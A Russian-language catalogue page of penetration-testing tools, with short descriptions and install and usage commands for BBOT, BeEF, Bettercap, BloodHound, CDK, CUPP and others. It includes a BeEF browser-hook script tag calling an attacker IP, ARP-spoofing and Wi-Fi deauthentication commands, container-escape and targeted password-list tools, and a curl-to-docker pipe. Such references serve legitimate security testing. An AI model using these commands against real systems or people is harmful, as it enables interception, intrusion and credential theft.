Каталог инструментов

325 инструментов

BBOT

v3.0.0
Reconnaissance

Рекурсивный OSINT-сканер для разведки attack surface от Black Lantern Security. 100+ модулей: поддомены (dnsx, amass, subfinder), сканирование портов, web-crawling, технологический стек, email-адреса, утечки паролей, интеграция с Shodan/SecurityTrails/VirusTotal. Строит …

pip install bbot # Перечисление поддоменов bbot -t example.com -p subdomain-enum # Web-разведка bbot -t example.com -p web # Максимально полный скан bbot -t example.com -p kitchen-sink -o /tmp/results

BeEF

v0.6.0.0
Exploitation

Browser Exploitation Framework — фреймворк для атак через XSS-хук на браузер. После внедрения JS-агента: сбор информации, атаки на внутреннюю сеть, социальная инженерия в браузере, эксплуатация расширений. 300+ модулей …

# Kali Linux (предустановлен): sudo beef-xss # Из исходников: git clone https://github.com/beefproject/beef cd beef bundle install sudo ./beef # Интерфейс: http://127.0.0.1:3000/ui/panel # Хук: <script src="http://yourip:3000/hook.js"></script>

Bettercap

v2.41.7
Network Analysis ★ featured

Швейцарский нож для сетевых атак и разведки. Поддерживает атаки на Wi-Fi, BLE, HID, ARP-спуфинг, MITM с модульной архитектурой и web-интерфейсом. Возможности: - ARP/DNS/mDNS-спуфинг, SSL-стриппинг - Wi-Fi: сканирование, деаутентификация, …

# apt: sudo apt install bettercap # go install: go install github.com/bettercap/bettercap@latest # macOS: brew install bettercap # Примеры: # Запустить с веб-интерфейсом: sudo bettercap -eval "api.rest on; ui on" # ARP-спуфинг + sniffing: sudo bettercap # > net.probe on # > set arp.spoof.targets 192.168.1.5 # > arp.spoof on # > net.sniff on # Wi-Fi деаутентификация: sudo bettercap -iface wlan0 # > wifi.recon on # > wifi.deauth TARGET_MAC

Binwalk

v3.1.0
Exploitation

Инструмент для анализа прошивок (firmware): обнаруживает и извлекает встроенные файловые системы, архивы и исполняемый код. Поддерживает рекурсивную распаковку. Широко применяется в hardware hacking, IoT security и CTF.

# Kali Linux / Ubuntu (v2, stable): sudo apt install binwalk # Из исходников (актуальная версия): git clone https://github.com/ReFirmLabs/binwalk cd binwalk pip3 install . binwalk firmware.bin # анализ binwalk -e firmware.bin # извлечение binwalk -Me firmware.bin # рекурсивная распаковка binwalk -A firmware.bin # поиск CPU-архитектур

BloodHound

v9.3.0
Reconnaissance ★ featured

Инструмент для визуализации и анализа путей атаки в Active Directory. Использует теорию графов для нахождения кратчайших маршрутов к Domain Admin. Собирает данные об объектах AD (SharpHound/BloodHound.py ingestor) и …

# BloodHound Community Edition (Docker) curl -L https://ghst.ly/getbhce | docker compose -f - up # Ingestor (сбор данных из домена) pip install bloodhound bloodhound-python -u user -p pass -d domain.local -c All # Классическая версия (Electron) # Скачать: https://github.com/BloodHoundAD/BloodHound/releases
Блог

BlueToolkit

vwoot-artifact-eval
Wireless & RF ★ featured

Расширяемый фреймворк для тестирования уязвимостей Bluetooth Classic (BR/EDR). Автоматически проверяет устройства на известные CVE: BlueBorne, BIAS, KNOB, SweynTooth. Поддерживает пользовательские модули атак и генерацию отчётов.

git clone https://github.com/sgxgsx/BlueToolkit cd BlueToolkit && pip install -r requirements.txt # Сканирование устройства на все уязвимости: python bluetoolkit.py -t aa:bb:cc:dd:ee:ff --all # Проверка KNOB: python bluetoolkit.py -t aa:bb:cc:dd:ee:ff --exploit knob

Boofuzz

v0.4.2
Exploitation

Python-фреймворк для сетевого фаззинга — преемник Sulley. Фаззинг произвольных сетевых протоколов: TCP, UDP, SSH, FTP, HTTP, промышленные протоколы (Modbus, DNP3) и другие. Поддерживает мониторинг краша, web-интерфейс для отслеживания …

pip3 install boofuzz # Из исходников: git clone https://github.com/jtpereyda/boofuzz cd boofuzz pip3 install . # Минимальный пример фаззинга HTTP: from boofuzz import * session = Session(target=Target(connection=TCPSocketConnection("127.0.0.1", 80))) s_initialize("HTTP GET") s_string("GET") s_delim(" ") s_string("/") s_static(" HTTP/1.1\r\n\r\n") session.connect(s_get("HTTP GET")) session.fuzz()

BruteSpray

v2.6.3
Password Attacks

Быстрый мультипротокольный брутфорсер на Go с TUI-интерфейсом: принимает вывод Nmap/Nessus/Nexpose и автоматически тестирует учётные данные по 30+ сервисам, поддерживает возобновление атак.

# Kali / Debian / Ubuntu sudo apt install brutespray # pip pip install brutespray # Из исходников git clone https://github.com/x90skysn3k/brutespray cd brutespray && pip install -r requirements.txt python brutespray.py --help

Burp Suite

Exploitation ★ featured Партнёр

Профессиональная платформа для тестирования безопасности веб-приложений. Proxy для перехвата трафика, Scanner, Intruder (фаззинг/брутфорс), Repeater, Decoder, Sequencer, Collaborator. Community Edition — бесплатна и покрывает большинство задач. Professional ($449/год) добавляет …

# Скачать JAR / установщик с официального сайта # https://portswigger.net/burp/communitydownload # Kali Linux (предустановлен) burpsuite # Запуск из JAR java -jar burpsuite_community_vX.X.X.jar

ByeDPI

v0.17.3
Anonymizers ★ featured

Userspace SOCKS5-прокси для обхода DPI без root-прав. В отличие от zapret (нужен netfilter/root) и GoodbyeDPI (Windows + WinDivert) — работает как обычный процесс, запускает локальный прокси на :1080, …

# Сборка из исходников git clone https://github.com/hufrea/byedpi cd byedpi && make # Запуск (пример с disorder + fake) ./ciadpi --disorder 1 --fake 1 --ttl 5 # Прокси слушает на 127.0.0.1:1080 # Завернуть браузер через прокси (Firefox: Manual proxy → SOCKS5 127.0.0.1:1080) # Или через proxychains: proxychains4 curl https://blocked.example.com

CDK

v1.5.6
Cloud & Container Security

Инструмент для атак изнутри скомпрометированного контейнера (container escape). Автоматически определяет runtime (Docker/containerd/CRI-O), ищет пути побега: privileged mode, exposed Docker socket, runc CVE. Включает модули для CVE-2019-5736, CVE-2022-0847 (DirtyPipe).

# Скачать статичный бинарник (работает внутри минимального контейнера) https://github.com/cdk-team/CDK/releases ./cdk evaluate --full

CUPP

v3.3.0
Password Attacks

Common User Passwords Profiler — генерирует целевые словари паролей на основе персональных данных цели: имя, дата рождения, кличка питомца, имя партнёра. Идеален для атак на конкретного человека.

# pip pip install cupp # Kali / Debian sudo apt install cupp # Из исходников git clone https://github.com/Mebus/cupp cd cupp && python cupp.py -h